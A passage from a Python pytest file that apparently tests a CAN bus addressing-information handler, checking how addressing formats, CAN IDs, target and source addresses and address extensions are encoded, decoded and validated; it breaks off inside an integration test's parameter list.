self._patcher_validate_raw_byte = patch(f"{self.SCRIPT_LOCATION}.validate_raw_byte")
self.mock_validate_raw_byte = self._patcher_validate_raw_byte.start()
self._patcher_validate_raw_bytes = patch(f"{self.SCRIPT_LOCATION}.validate_raw_bytes")
self.mock_validate_raw_bytes = self._patcher_validate_raw_bytes.start()
def teardown(self):
self._patcher_validate_addressing_format.stop()
self._patcher_validate_addressing_type.stop()
self._patcher_can_id_handler_class.stop()
self._patcher_validate_raw_byte.stop()
self._patcher_validate_raw_bytes.stop()
# decode_ai
@pytest.mark.parametrize("addressing_format, can_id, ai_data_bytes", [
("Some Format", "CAN ID", "soem AI Data Bytes"),
("Another Format", 0x78D, []),
])
@patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.decode_ai_data_bytes")
def test_decode_ai(self, mock_decode_ai_data_bytes, addressing_format, can_id, ai_data_bytes):
ai_values = CanAddressingInformationHandler.decode_ai(addressing_format=addressing_format,
can_id=can_id,
ai_data_bytes=ai_data_bytes)
assert isinstance(ai_values, dict)
assert set(ai_values.keys()) == {CanAddressingInformationHandler.ADDRESSING_TYPE_NAME,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME,
CanAddressingInformationHandler.SOURCE_ADDRESS_NAME,
CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME}
self.mock_can_id_handler_class.decode_can_id.assert_called_once_with(addressing_format=addressing_format,
can_id=can_id)
mock_decode_ai_data_bytes.assert_called_once_with(addressing_format=addressing_format,
ai_data_bytes=ai_data_bytes)
# decode_ai_data_bytes
@pytest.mark.parametrize("addressing_format", [None, "unknown addressing format"])
@pytest.mark.parametrize("ai_data_bytes", [[], (0xFF,)])
@patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_data_bytes")
def test_decode_ai_data_bytes__not_implemented(self, mock_validate_ai_data_bytes, addressing_format,
ai_data_bytes):
with pytest.raises(NotImplementedError):
CanAddressingInformationHandler.decode_ai_data_bytes(addressing_format=addressing_format,
ai_data_bytes=ai_data_bytes)
mock_validate_ai_data_bytes.assert_called_once_with(addressing_format=addressing_format,
ai_data_bytes=ai_data_bytes)
@pytest.mark.parametrize("addressing_format", [CanAddressingFormat.NORMAL_11BIT_ADDRESSING,
CanAddressingFormat.NORMAL_FIXED_ADDRESSING])
@pytest.mark.parametrize("ai_data_bytes", [[], (0xCF,)])
@patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_data_bytes")
def test_decode_ai_data_bytes__normal(self, mock_validate_ai_data_bytes, addressing_format, ai_data_bytes):
decoded_values = CanAddressingInformationHandler.decode_ai_data_bytes(addressing_format=addressing_format,
ai_data_bytes=ai_data_bytes)
assert isinstance(decoded_values, dict)
assert set(decoded_values.keys()) == {CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME}
assert decoded_values[CanAddressingInformationHandler.TARGET_ADDRESS_NAME] is None
assert decoded_values[CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME] is None
mock_validate_ai_data_bytes.assert_called_once_with(addressing_format=addressing_format,
ai_data_bytes=ai_data_bytes)
@pytest.mark.parametrize("ai_data_bytes", [[0x0A], (0xCF,)])
@patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_data_bytes")
def test_decode_ai_data_bytes__extended(self, mock_validate_ai_data_bytes, ai_data_bytes):
decoded_values = CanAddressingInformationHandler.decode_ai_data_bytes(
addressing_format=CanAddressingFormat.EXTENDED_ADDRESSING, ai_data_bytes=ai_data_bytes)
assert isinstance(decoded_values, dict)
assert set(decoded_values.keys()) == {CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME}
assert decoded_values[CanAddressingInformationHandler.TARGET_ADDRESS_NAME] == ai_data_bytes[0]
assert decoded_values[CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME] is None
mock_validate_ai_data_bytes.assert_called_once_with(addressing_format=CanAddressingFormat.EXTENDED_ADDRESSING,
ai_data_bytes=ai_data_bytes)
@pytest.mark.parametrize("addressing_format", [CanAddressingFormat.MIXED_11BIT_ADDRESSING,
CanAddressingFormat.MIXED_29BIT_ADDRESSING])
@pytest.mark.parametrize("ai_data_bytes", [[0x0A], (0xCF,)])
@patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_data_bytes")
def test_decode_ai_data_bytes__mixed(self, mock_validate_ai_data_bytes, addressing_format, ai_data_bytes):
decoded_values = CanAddressingInformationHandler.decode_ai_data_bytes(addressing_format=addressing_format,
ai_data_bytes=ai_data_bytes)
assert isinstance(decoded_values, dict)
assert set(decoded_values.keys()) == {CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME}
assert decoded_values[CanAddressingInformationHandler.TARGET_ADDRESS_NAME] is None
assert decoded_values[CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME] == ai_data_bytes[0]
mock_validate_ai_data_bytes.assert_called_once_with(addressing_format=addressing_format,
ai_data_bytes=ai_data_bytes)
# encode_ai_data_bytes
@pytest.mark.parametrize("addressing_format", [CanAddressingFormat.NORMAL_11BIT_ADDRESSING,
CanAddressingFormat.NORMAL_FIXED_ADDRESSING])
@pytest.mark.parametrize("target_address, address_extension", [
(None, None),
(0x5B, 0x9E),
])
def test_generate_ai_data_bytes__normal(self, addressing_format, target_address, address_extension):
assert CanAddressingInformationHandler.encode_ai_data_bytes(addressing_format=addressing_format,
address_extension=address_extension,
target_address=target_address) == []
self.mock_validate_addressing_format.assert_called_once_with(addressing_format)
self.mock_validate_raw_byte.assert_not_called()
@pytest.mark.parametrize("target_address, address_extension", [
(None, None),
(0x5B, 0x9E),
])
def test_generate_ai_data_bytes__extended(self, target_address, address_extension):
assert CanAddressingInformationHandler.encode_ai_data_bytes(
addressing_format=CanAddressingFormat.EXTENDED_ADDRESSING,
address_extension=address_extension,
target_address=target_address) == [target_address]
self.mock_validate_addressing_format.assert_called_once_with(CanAddressingFormat.EXTENDED_ADDRESSING)
self.mock_validate_raw_byte.assert_called_once_with(target_address)
@pytest.mark.parametrize("addressing_format", [CanAddressingFormat.MIXED_11BIT_ADDRESSING,
CanAddressingFormat.MIXED_29BIT_ADDRESSING])
@pytest.mark.parametrize("target_address, address_extension", [
(None, None),
(0x5B, 0x9E),
])
def test_generate_ai_data_bytes__mixed(self, addressing_format, target_address, address_extension):
assert CanAddressingInformationHandler.encode_ai_data_bytes(
addressing_format=addressing_format,
address_extension=address_extension,
target_address=target_address) == [address_extension]
self.mock_validate_addressing_format.assert_called_once_with(addressing_format)
self.mock_validate_raw_byte.assert_called_once_with(address_extension)
@pytest.mark.parametrize("addressing_format", [None, "something else"])
@pytest.mark.parametrize("target_address, address_extension", [
(None, None),
(0x5B, 0x9E),
])
def test_generate_ai_data_bytes__unknown(self, addressing_format, target_address, address_extension):
with pytest.raises(NotImplementedError):
CanAddressingInformationHandler.encode_ai_data_bytes(addressing_format=addressing_format,
address_extension=address_extension,
target_address=target_address)
self.mock_validate_addressing_format.assert_called_once_with(addressing_format)
self.mock_validate_raw_byte.assert_not_called()
# get_ai_data_bytes_number
def test_get_ai_data_bytes_number(self, example_can_addressing_format):
value = CanAddressingInformationHandler.get_ai_data_bytes_number(example_can_addressing_format)
assert isinstance(value, int)
assert value >= 0
self.mock_validate_addressing_format.assert_called_once_with(example_can_addressing_format)
# validate_ai
@pytest.mark.parametrize("addressing_format", [None, "unknown addressing format"])
@pytest.mark.parametrize("addressing_type, can_id, target_address, source_address, address_extension", [
("some addressing", "some CAN ID", "TA", "SA", "AE"),
(AddressingType.PHYSICAL, 0x8213, 0x9A, 0x0B, 0xF1),
])
def test_validate_ai__unknown_addressing_format(self, addressing_format, addressing_type, can_id,
target_address, source_address, address_extension):
with pytest.raises(NotImplementedError):
CanAddressingInformationHandler.validate_ai(addressing_format=addressing_format,
addressing_type=addressing_type,
can_id=can_id,
target_address=target_address,
source_address=source_address,
address_extension=address_extension)
self.mock_validate_addressing_format.assert_called_once_with(addressing_format)
@pytest.mark.parametrize("addressing_type, can_id", [
("some addressing", "some CAN ID"),
(AddressingType.PHYSICAL, 0x8213),
])
@patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_normal_11bit")
def test_validate_ai__normal_11bit__valid(self, mock_validate_ai_normal_11bit,
addressing_type, can_id):
CanAddressingInformationHandler.validate_ai(addressing_format=CanAddressingFormat.NORMAL_11BIT_ADDRESSING,
addressing_type=addressing_type,
can_id=can_id)
mock_validate_ai_normal_11bit.assert_called_once_with(addressing_type=addressing_type,
can_id=can_id)
@pytest.mark.parametrize("addressing_type, can_id, target_address, source_address, address_extension", [
("some addressing", "some CAN ID", "TA", "SA", "AE"),
("some addressing", "some CAN ID", "TA", None, None),
(AddressingType.PHYSICAL, 0x8213, None, None, 0xF1),
])
@patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_normal_11bit")
def test_validate_ai__normal_11bit__invalid(self, mock_validate_ai_normal_11bit,
addressing_type, can_id,
target_address, source_address, address_extension):
with pytest.raises(UnusedArgumentError):
CanAddressingInformationHandler.validate_ai(addressing_format=CanAddressingFormat.NORMAL_11BIT_ADDRESSING,
addressing_type=addressing_type,
can_id=can_id,
target_address=target_address,
source_address=source_address,
address_extension=address_extension)
mock_validate_ai_normal_11bit.assert_not_called()
@pytest.mark.parametrize("addressing_type, can_id, target_address, source_address", [
("some addressing", "some CAN ID", "TA", "SA"),
(AddressingType.PHYSICAL, 0x8213, 0x9A, 0x0B),
])
@patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_normal_fixed")
def test_validate_ai__normal_fixed__valid(self, mock_validate_ai_normal_fixed,
addressing_type, can_id, target_address, source_address):
CanAddressingInformationHandler.validate_ai(addressing_format=CanAddressingFormat.NORMAL_FIXED_ADDRESSING,
addressing_type=addressing_type,
can_id=can_id,
target_address=target_address,
source_address=source_address)
mock_validate_ai_normal_fixed.assert_called_once_with(addressing_type=addressing_type,
can_id=can_id,
target_address=target_address,
source_address=source_address)
@pytest.mark.parametrize("addressing_type, can_id, target_address, source_address", [
("some addressing", "some CAN ID", "TA", "SA"),
(AddressingType.PHYSICAL, 0x8213, 0x9A, 0x0B),
])
@pytest.mark.parametrize("address_extension", ["AE", 0x9B, 1])
@patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_normal_fixed")
def test_validate_ai__normal_fixed__invalid(self, mock_validate_ai_normal_fixed,
addressing_type, can_id,
target_address, source_address, address_extension):
with pytest.raises(UnusedArgumentError):
CanAddressingInformationHandler.validate_ai(addressing_format=CanAddressingFormat.NORMAL_FIXED_ADDRESSING,
addressing_type=addressing_type,
can_id=can_id,
target_address=target_address,
source_address=source_address,
address_extension=address_extension)
mock_validate_ai_normal_fixed.assert_not_called()
@pytest.mark.parametrize("addressing_type, can_id, target_address", [
("some addressing", "some CAN ID", "TA"),
(AddressingType.PHYSICAL, 0x8213, 0x9A),
])
@patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_extended")
def test_validate_ai__extended__valid(self, mock_validate_ai_extended,
addressing_type, can_id, target_address):
CanAddressingInformationHandler.validate_ai(addressing_format=CanAddressingFormat.EXTENDED_ADDRESSING,
addressing_type=addressing_type,
can_id=can_id,
target_address=target_address)
mock_validate_ai_extended.assert_called_once_with(addressing_type=addressing_type,
can_id=can_id,
target_address=target_address)
@pytest.mark.parametrize("addressing_type, can_id, target_address", [
("some addressing", "some CAN ID", "TA"),
(AddressingType.PHYSICAL, 0x8213, 0x9A),
])
@pytest.mark.parametrize("source_address, address_extension", [
("SA", "AE"),
("SA", None),
(None, "AE"),
(0x0B, 0xF1),
])
@patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_extended")
def test_validate_ai__extended__invalid(self, mock_validate_ai_extended,
addressing_type, can_id,
target_address, source_address, address_extension):
with pytest.raises(UnusedArgumentError):
CanAddressingInformationHandler.validate_ai(addressing_format=CanAddressingFormat.EXTENDED_ADDRESSING,
addressing_type=addressing_type,
can_id=can_id,
target_address=target_address,
source_address=source_address,
address_extension=address_extension)
mock_validate_ai_extended.assert_not_called()
@pytest.mark.parametrize("addressing_type, can_id, address_extension", [
("some addressing", "some CAN ID", "AE"),
(AddressingType.PHYSICAL, 0x8213, 0xF1),
])
@patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_mixed_11bit")
def test_validate_ai__mixed_11bit__valid(self, mock_validate_ai_mixed_11bit,
addressing_type, can_id, address_extension):
CanAddressingInformationHandler.validate_ai(addressing_format=CanAddressingFormat.MIXED_11BIT_ADDRESSING,
addressing_type=addressing_type,
can_id=can_id,
address_extension=address_extension)
mock_validate_ai_mixed_11bit.assert_called_once_with(addressing_type=addressing_type,
can_id=can_id,
address_extension=address_extension)
@pytest.mark.parametrize("addressing_type, can_id, address_extension", [
("some addressing", "some CAN ID", "AE"),
(AddressingType.PHYSICAL, 0x8213, 0xF1),
])
@pytest.mark.parametrize("target_address, source_address", [
("TA", "SA"),
("TA", None),
(None, "SA"),
(0x0B, 0xF1),
])
@patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_mixed_11bit")
def test_validate_ai__mixed_11bit__invalid(self, mock_validate_ai_mixed_11bit,
addressing_type, can_id,
target_address, source_address, address_extension):
with pytest.raises(UnusedArgumentError):
CanAddressingInformationHandler.validate_ai(addressing_format=CanAddressingFormat.MIXED_11BIT_ADDRESSING,
addressing_type=addressing_type,
can_id=can_id,
target_address=target_address,
source_address=source_address,
address_extension=address_extension)
mock_validate_ai_mixed_11bit.assert_not_called()
@pytest.mark.parametrize("addressing_type, can_id, target_address, source_address, address_extension", [
("some addressing", "some CAN ID", "TA", "SA", "AE"),
(0, None, None, None, None),
(AddressingType.PHYSICAL, 0x8213, 0x9A, 0x0B, 0xF1),
])
@patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_mixed_29bit")
def test_validate_ai__mixed_29bit(self, mock_validate_ai_mixed_29bit,
addressing_type, can_id,
target_address, source_address, address_extension):
CanAddressingInformationHandler.validate_ai(addressing_format=CanAddressingFormat.MIXED_29BIT_ADDRESSING,
addressing_type=addressing_type,
can_id=can_id,
target_address=target_address,
source_address=source_address,
address_extension=address_extension)
mock_validate_ai_mixed_29bit.assert_called_once_with(addressing_type=addressing_type,
can_id=can_id,
target_address=target_address,
source_address=source_address,
address_extension=address_extension)
# validate_ai_normal_11bit
@pytest.mark.parametrize("addressing_type, can_id", [
("some addressing type", "some id"),
(AddressingType.PHYSICAL, 0x7FF),
])
def test_validate_ai_normal_11bit__invalid_can_id(self, addressing_type, can_id):
self.mock_can_id_handler_class.is_normal_11bit_addressed_can_id.return_value = False
with pytest.raises(InconsistentArgumentsError):
CanAddressingInformationHandler.validate_ai_normal_11bit(addressing_type=addressing_type,
can_id=can_id)
self.mock_can_id_handler_class.validate_can_id.assert_called_once_with(can_id)
self.mock_can_id_handler_class.is_normal_11bit_addressed_can_id.assert_called_once_with(can_id)
@pytest.mark.parametrize("addressing_type, can_id", [
("some addressing type", "some id"),
(AddressingType.PHYSICAL, 0x7FF),
])
def test_validate_ai_normal_11bit__valid(self, addressing_type, can_id):
self.mock_can_id_handler_class.is_normal_11bit_addressed_can_id.return_value = True
CanAddressingInformationHandler.validate_ai_normal_11bit(addressing_type=addressing_type,
can_id=can_id)
self.mock_can_id_handler_class.validate_can_id.assert_called_once_with(can_id)
self.mock_can_id_handler_class.is_normal_11bit_addressed_can_id.assert_called_once_with(can_id)
self.mock_validate_addressing_type.assert_called_once_with(addressing_type)
# validate_ai_normal_fixed
@pytest.mark.parametrize("addressing_type", ["some addressing type", AddressingType.PHYSICAL])
@pytest.mark.parametrize("can_id, target_address, source_address", [
(None, None, 0),
(None, 0x05, None),
(None, None, None),
])
def test_validate_ai_normal_fixed__missing_info(self, addressing_type, can_id,
target_address, source_address):
self.mock_can_id_handler_class.is_normal_fixed_addressed_can_id.return_value = True
with pytest.raises(InconsistentArgumentsError):
CanAddressingInformationHandler.validate_ai_normal_fixed(addressing_type=addressing_type,
can_id=can_id,
target_address=target_address,
source_address=source_address)
@pytest.mark.parametrize("can_id", ["some CAN ID", 0x8FABC])
@pytest.mark.parametrize("addressing_type, decoded_addressing_type, ta, decoded_ta, sa, decoded_sa", [
(AddressingType.PHYSICAL, AddressingType.PHYSICAL, None, 0x55, 0x7F, 0x80),
("something", "something else", None, 0x55, None, 0x10),
("something", "something", 0x56, 0x55, None, 0x10),
("something", "something else", 0x56, 0x55, 0x7F, 0x10),
])
def test_validate_ai_normal_fixed__inconsistent_can_id_ta_sa(self, can_id, addressing_type, decoded_addressing_type,
ta, decoded_ta, sa, decoded_sa):
self.mock_can_id_handler_class.decode_normal_fixed_addressed_can_id.return_value = {
self.mock_can_id_handler_class.ADDRESSING_TYPE_NAME: decoded_addressing_type,
self.mock_can_id_handler_class.TARGET_ADDRESS_NAME: decoded_ta,
self.mock_can_id_handler_class.SOURCE_ADDRESS_NAME: decoded_sa
}
with pytest.raises(InconsistentArgumentsError):
CanAddressingInformationHandler.validate_ai_normal_fixed(addressing_type=addressing_type,
can_id=can_id,
target_address=ta,
source_address=sa)
self.mock_can_id_handler_class.decode_normal_fixed_addressed_can_id.assert_called_once_with(can_id)
@pytest.mark.parametrize("addressing_type", ["some addressing type", AddressingType.PHYSICAL])
@pytest.mark.parametrize("target_address, source_address", [
("ta", "sa"),
(0xFA, 0x55),
])
def test_validate_ai_normal_fixed__valid_without_can_id(self, addressing_type, target_address, source_address):
CanAddressingInformationHandler.validate_ai_normal_fixed(addressing_type=addressing_type,
can_id=None,
target_address=target_address,
source_address=source_address)
self.mock_validate_addressing_type.assert_called_once_with(addressing_type)
self.mock_validate_raw_byte.assert_has_calls([call(target_address), call(source_address)], any_order=True)
self.mock_can_id_handler_class.validate_can_id.assert_not_called()
self.mock_can_id_handler_class.decode_normal_fixed_addressed_can_id.assert_not_called()
@pytest.mark.parametrize("addressing_type", ["some addressing type", AddressingType.PHYSICAL])
@pytest.mark.parametrize("can_id", ["some CAN ID", 0x85421])
@pytest.mark.parametrize("target_address, source_address", [
(None, None),
(0x12, None),
(None, 0x34),
("ta", "sa"),
])
def test_validate_ai_normal_fixed__valid_with_can_id(self, addressing_type, can_id, target_address, source_address):
self.mock_can_id_handler_class.decode_normal_fixed_addressed_can_id.return_value = {
self.mock_can_id_handler_class.ADDRESSING_TYPE_NAME: addressing_type,
self.mock_can_id_handler_class.TARGET_ADDRESS_NAME: target_address or "ta",
self.mock_can_id_handler_class.SOURCE_ADDRESS_NAME: source_address or "sa",
}
CanAddressingInformationHandler.validate_ai_normal_fixed(addressing_type=addressing_type,
can_id=can_id,
target_address=target_address,
source_address=source_address)
self.mock_validate_addressing_type.assert_called_once_with(addressing_type)
self.mock_validate_raw_byte.assert_not_called()
self.mock_can_id_handler_class.decode_normal_fixed_addressed_can_id.assert_called_once_with(can_id)
# validate_ai_extended
@pytest.mark.parametrize("addressing_type, can_id", [
("some addressing type", "some id"),
(AddressingType.PHYSICAL, 0x7FF),
])
@pytest.mark.parametrize("target_address", ["some TA", 0x5B])
def test_validate_ai_extended__invalid_can_id(self, addressing_type, can_id, target_address):
self.mock_can_id_handler_class.is_extended_addressed_can_id.return_value = False
with pytest.raises(InconsistentArgumentsError):
CanAddressingInformationHandler.validate_ai_extended(addressing_type=addressing_type,
can_id=can_id,
target_address=target_address)
self.mock_can_id_handler_class.validate_can_id.assert_called_once_with(can_id)
self.mock_can_id_handler_class.is_extended_addressed_can_id.assert_called_once_with(can_id)
@pytest.mark.parametrize("addressing_type, can_id", [
("some addressing type", "some id"),
(AddressingType.PHYSICAL, 0x7FF),
])
@pytest.mark.parametrize("target_address", ["some TA", 0x5B])
def test_validate_ai_extended__valid(self, addressing_type, can_id, target_address):
self.mock_can_id_handler_class.is_extended_addressed_can_id.return_value = True
CanAddressingInformationHandler.validate_ai_extended(addressing_type=addressing_type,
can_id=can_id,
target_address=target_address)
self.mock_can_id_handler_class.validate_can_id.assert_called_once_with(can_id)
self.mock_can_id_handler_class.is_extended_addressed_can_id.assert_called_once_with(can_id)
self.mock_validate_addressing_type.assert_called_once_with(addressing_type)
self.mock_validate_raw_byte.assert_called_once_with(target_address)
# validate_ai_mixed_11bit
@pytest.mark.parametrize("addressing_type, can_id", [
("some addressing type", "some id"),
(AddressingType.PHYSICAL, 0x7FF),
])
@pytest.mark.parametrize("address_extension", ["some AE", 0x5B])
def test_validate_ai_mixed_11bit__invalid_can_id(self, addressing_type, can_id, address_extension):
self.mock_can_id_handler_class.is_mixed_11bit_addressed_can_id.return_value = False
with pytest.raises(InconsistentArgumentsError):
CanAddressingInformationHandler.validate_ai_mixed_11bit(addressing_type=addressing_type,
can_id=can_id,
address_extension=address_extension)
self.mock_can_id_handler_class.validate_can_id.assert_called_once_with(can_id)
self.mock_can_id_handler_class.is_mixed_11bit_addressed_can_id.assert_called_once_with(can_id)
@pytest.mark.parametrize("addressing_type, can_id", [
("some addressing type", "some id"),
(AddressingType.PHYSICAL, 0x7FF),
])
@pytest.mark.parametrize("address_extension", ["some AE", 0x5B])
def test_validate_ai_mixed_11bit__valid(self, addressing_type, can_id, address_extension):
self.mock_can_id_handler_class.is_mixed_11bit_addressed_can_id.return_value = True
CanAddressingInformationHandler.validate_ai_mixed_11bit(addressing_type=addressing_type,
can_id=can_id,
address_extension=address_extension)
self.mock_can_id_handler_class.validate_can_id.assert_called_once_with(can_id)
self.mock_can_id_handler_class.is_mixed_11bit_addressed_can_id.assert_called_once_with(can_id)
self.mock_validate_addressing_type.assert_called_once_with(addressing_type)
self.mock_validate_raw_byte.assert_called_once_with(address_extension)
# validate_ai_mixed_29bit
@pytest.mark.parametrize("addressing_type", ["some addressing type", AddressingType.PHYSICAL])
@pytest.mark.parametrize("can_id, target_address, source_address", [
(None, None, 0),
(None, 0x05, None),
(None, None, None),
])
@pytest.mark.parametrize("address_extension", ["some AE", 0x5B])
def test_validate_ai_mixed_29bit__missing_info(self, addressing_type, can_id,
target_address, source_address, address_extension):
self.mock_can_id_handler_class.is_mixed_29bit_addressed_can_id.return_value = True
with pytest.raises(InconsistentArgumentsError):
CanAddressingInformationHandler.validate_ai_mixed_29bit(addressing_type=addressing_type,
can_id=can_id,
target_address=target_address,
source_address=source_address,
address_extension=address_extension)
@pytest.mark.parametrize("can_id", ["some CAN ID", 0x8FABC])
@pytest.mark.parametrize("addressing_type, decoded_addressing_type, ta, decoded_ta, sa, decoded_sa", [
(AddressingType.PHYSICAL, AddressingType.PHYSICAL, None, 0x55, 0x7F, 0x80),
("something", "something else", None, 0x55, None, 0x10),
("something", "something", 0x56, 0x55, None, 0x10),
("something", "something else", 0x56, 0x55, 0x7F, 0x10),
])
@pytest.mark.parametrize("address_extension", ["some AE", 0x5B])
def test_validate_ai_mixed_29bit__inconsistent_can_id_ta_sa(self, can_id, addressing_type, decoded_addressing_type,
ta, decoded_ta, sa, decoded_sa, address_extension):
self.mock_can_id_handler_class.decode_mixed_addressed_29bit_can_id.return_value = {
self.mock_can_id_handler_class.ADDRESSING_TYPE_NAME: decoded_addressing_type,
self.mock_can_id_handler_class.TARGET_ADDRESS_NAME: decoded_ta,
self.mock_can_id_handler_class.SOURCE_ADDRESS_NAME: decoded_sa,
}
with pytest.raises(InconsistentArgumentsError):
CanAddressingInformationHandler.validate_ai_mixed_29bit(addressing_type=addressing_type,
can_id=can_id,
target_address=ta,
source_address=sa,
address_extension=address_extension)
self.mock_can_id_handler_class.decode_mixed_addressed_29bit_can_id.assert_called_once_with(can_id)
@pytest.mark.parametrize("addressing_type", ["some addressing type", AddressingType.PHYSICAL])
@pytest.mark.parametrize("target_address, source_address", [
("ta", "sa"),
(0, 0),
(0xFA, 0x55),
])
@pytest.mark.parametrize("address_extension", ["some AE", 0x5B])
def test_validate_ai_mixed_29bit__valid_without_can_id(self, addressing_type,
target_address, source_address, address_extension):
CanAddressingInformationHandler.validate_ai_mixed_29bit(addressing_type=addressing_type,
can_id=None,
target_address=target_address,
source_address=source_address,
address_extension=address_extension)
self.mock_validate_addressing_type.assert_called_once_with(addressing_type)
self.mock_validate_raw_byte.assert_has_calls([call(target_address), call(source_address),
call(address_extension)], any_order=True)
self.mock_can_id_handler_class.validate_can_id.assert_not_called()
self.mock_can_id_handler_class.decode_mixed_addressed_29bit_can_id.assert_not_called()
@pytest.mark.parametrize("can_id", ["some CAN ID", 0x85421])
@pytest.mark.parametrize("target_address, source_address, addressing_type", [
(None, None, "XD"),
(0x12, None, AddressingType.FUNCTIONAL),
(None, 0x34, AddressingType.PHYSICAL),
("ta", "sa", "some addressing type"),
])
@pytest.mark.parametrize("address_extension", ["some AE", 0x5B])
def test_validate_ai_mixed_29bit__valid_with_can_id(self, addressing_type, can_id,
target_address, source_address, address_extension):
self.mock_can_id_handler_class.decode_mixed_addressed_29bit_can_id.return_value = {
self.mock_can_id_handler_class.ADDRESSING_TYPE_NAME: addressing_type,
self.mock_can_id_handler_class.TARGET_ADDRESS_NAME: target_address or "ta",
self.mock_can_id_handler_class.SOURCE_ADDRESS_NAME: source_address or "sa",
}
CanAddressingInformationHandler.validate_ai_mixed_29bit(addressing_type=addressing_type,
can_id=can_id,
target_address=target_address,
source_address=source_address,
address_extension=address_extension)
self.mock_validate_addressing_type.assert_called_once_with(addressing_type)
self.mock_validate_raw_byte.assert_called_once_with(address_extension)
self.mock_can_id_handler_class.decode_mixed_addressed_29bit_can_id.assert_called_once_with(can_id)
# validate_ai_data_bytes
@pytest.mark.parametrize("addressing_format", ["Addressing Format", CanAddressingFormat.NORMAL_FIXED_ADDRESSING])
@pytest.mark.parametrize("ai_data_bytes", [[], (0x12,), [0x9A, 0xD3]])
@patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.get_ai_data_bytes_number")
def test_validate_ai_data_bytes__invalid(self, mock_get_ai_data_bytes_number, addressing_format, ai_data_bytes):
mock_get_ai_data_bytes_number.return_value = MagicMock(__eq__=Mock(return_value=False))
with pytest.raises(InconsistentArgumentsError):
CanAddressingInformationHandler.validate_ai_data_bytes(addressing_format=addressing_format,
ai_data_bytes=ai_data_bytes)
self.mock_validate_addressing_format.assert_called_once_with(addressing_format)
self.mock_validate_raw_bytes.assert_called_once_with(ai_data_bytes, allow_empty=True)
mock_get_ai_data_bytes_number.assert_called_once_with(addressing_format)
@pytest.mark.parametrize("addressing_format", ["Addressing Format", CanAddressingFormat.NORMAL_FIXED_ADDRESSING])
@pytest.mark.parametrize("ai_data_bytes", [[], (0x12,), [0x9A, 0xD3]])
@patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.get_ai_data_bytes_number")
def test_validate_ai_data_bytes__valid(self, mock_get_ai_data_bytes_number, addressing_format, ai_data_bytes):
mock_get_ai_data_bytes_number.return_value = len(ai_data_bytes)
CanAddressingInformationHandler.validate_ai_data_bytes(addressing_format=addressing_format,
ai_data_bytes=ai_data_bytes)
self.mock_validate_addressing_format.assert_called_once_with(addressing_format)
self.mock_validate_raw_bytes.assert_called_once_with(ai_data_bytes, allow_empty=True)
mock_get_ai_data_bytes_number.assert_called_once_with(addressing_format)
@pytest.mark.integration
class TestCanAddressingInformationHandlerIntegration:
EMPTY_AI_INFO = {
CanAddressingInformationHandler.ADDRESSING_TYPE_NAME: None,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME: None,
CanAddressingInformationHandler.SOURCE_ADDRESS_NAME: None,
CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME: None,
}
# decode_ai
@pytest.mark.parametrize("addressing_format, can_id, ai_data_bytes, expected_output", [
# Normal 11 bit
(CanAddressingFormat.NORMAL_11BIT_ADDRESSING, 0x620, [], EMPTY_AI_INFO),
# Normal Fixed
(CanAddressingFormat.NORMAL_FIXED_ADDRESSING, 0x18DA1234, [], {
CanAddressingInformationHandler.ADDRESSING_TYPE_NAME: AddressingType.PHYSICAL,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME: 0x12,
CanAddressingInformationHandler.SOURCE_ADDRESS_NAME: 0x34,
CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME: None,
}),
(CanAddressingFormat.NORMAL_FIXED_ADDRESSING, 0x18DBB0C2, [], {
CanAddressingInformationHandler.ADDRESSING_TYPE_NAME: AddressingType.FUNCTIONAL,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME: 0xB0,
CanAddressingInformationHandler.SOURCE_ADDRESS_NAME: 0xC2,
CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME: None,
}),
# Extended
(CanAddressingFormat.EXTENDED_ADDRESSING, 0x645, [0xE3], {
CanAddressingInformationHandler.ADDRESSING_TYPE_NAME: None,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME: 0xE3,
CanAddressingInformationHandler.SOURCE_ADDRESS_NAME: None,
CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME: None,
}),
(CanAddressingFormat.EXTENDED_ADDRESSING, 0x1A654321, [0xFF], {
CanAddressingInformationHandler.ADDRESSING_TYPE_NAME: None,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME: 0xFF,
CanAddressingInformationHandler.SOURCE_ADDRESS_NAME: None,
CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME: None,
}),
# Mixed 11bit
(CanAddressingFormat.MIXED_11BIT_ADDRESSING, 0x7F3, [0x0B], {
CanAddressingInformationHandler.ADDRESSING_TYPE_NAME: None,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME: None,
